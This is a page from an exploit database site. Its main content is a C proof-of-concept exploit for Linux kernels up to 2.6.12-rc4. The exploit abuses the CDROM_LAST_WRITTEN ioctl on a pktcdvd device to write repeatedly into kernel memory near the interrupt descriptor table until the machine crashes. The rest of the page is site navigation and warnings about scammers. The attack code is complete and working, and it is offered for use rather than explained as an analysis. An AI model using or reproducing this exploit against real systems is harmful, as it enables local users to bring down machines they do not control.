0day.today - Biggest Exploit Database in the World.
![](/img/logo_green.jpg)
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earnGOLD
Administration of this site uses the official contacts. Beware of impostors!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Linux Kernel <= 2.6.12-rc4 (ioctl_by_bdev) Local Denial of Service Exploit
========================================================================== Linux Kernel <= 2.6.12-rc4 (ioctl_by_bdev) Local Denial of Service Exploit ========================================================================== /* pktcdvd_dos.c proof-of-concept * This is only a lame POC which will crash the machine, no root shell here. * --- alert7 * 2005-5-15 * the vulnerability in 2.6 up to and including 2.6.12-rc4 * * gcc -o pktcdvd_dos pktcdvd_dos.c * * NOTE: require user can read pktcdvd block device * THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED "AS IS" * AND WITHOUT ANY WARRANTY. COPYING, PRINTING, DISTRIBUTION, MODIFICATION * WITHOUT PERMISSION OF THE AUTHOR IS STRICTLY PROHIBITED. */ #define _GNU_SOURCE #include <stdio.h> #include <stdlib.h> #include <errno.h> #include <string.h> #include <unistd.h> #include <fcntl.h> #include <signal.h> #include <paths.h> #include <grp.h> #include <setjmp.h> #include <stdint.h> #include <sys/mman.h> #include <sys/ipc.h> #include <sys/shm.h> #include <sys/ucontext.h> #include <sys/wait.h> #include <asm/ldt.h> #include <asm/page.h> #include <asm/segment.h> #include <linux/unistd.h> #include <linux/linkage.h> #include <sys/types.h> #include <sys/stat.h> #include <fcntl.h> #include <linux/sysctl.h> #include <linux/cdrom.h> #define __NR_sys_ioctl __NR_ioctl #define PKTCDVDDEVICE "/dev/hdc" static inline _syscall3(int, sys_ioctl, int ,fd,int, cmd,unsigned long, arg); struct idtr { unsigned short limit; unsigned int base; } __attribute__ ((packed)); unsigned int get_addr_idt() { struct idtr idtr; asm("sidt %0" : "=m" (idtr)); return idtr.base; } struct desc_struct { unsigned long a,b; }; int main(int argc,char **argv) { unsigned int ptr_idt; int iret ; int fd; printf("[++]user stack addr %p \n",&ptr_idt); if ( ( (unsigned long )&ptr_idt >>24)==0xfe){ printf("[--]this kernel patched 4g/4g patch,no vulnerability!\n"); return -1; } ptr_idt=get_addr_idt(); printf("[++]IDT Addr %p \n",ptr_idt); fd = open(PKTCDVDDEVICE,O_RDONLY); if (fd ==-1) { printf("[--]"); fflush(stdout); perror("open"); return -1; } unsigned long WriteTo ; if ( (ptr_idt>>24)==0xc0){ printf("[++]this OS in Real Linux\n"); WriteTo= ptr_idt; }else{ printf("[++]this OS maybe in VMWARE\n"); WriteTo = 0xc0100000; } printf("[++]call sys_ioctl will crash machine\n"); fflush(stdout); int loopi; for (loopi=0;loopi<0x100000 ;loopi++ ) { printf("[++]will write data at 0x%x\n",WriteTo+loopi*4); fflush(stdout); iret = sys_ioctl(fd, CDROM_LAST_WRITTEN, WriteTo+loopi*4); if (iret ==-1) { printf("[--]"); fflush(stdout); perror("ioctl"); //if in VMWARE ,rewrite ptr_idt adress will failed printf("[--]still aliving\n"); close(fd); return -1; } } close(fd); return 0; } # 0day.today [2024-07-07] #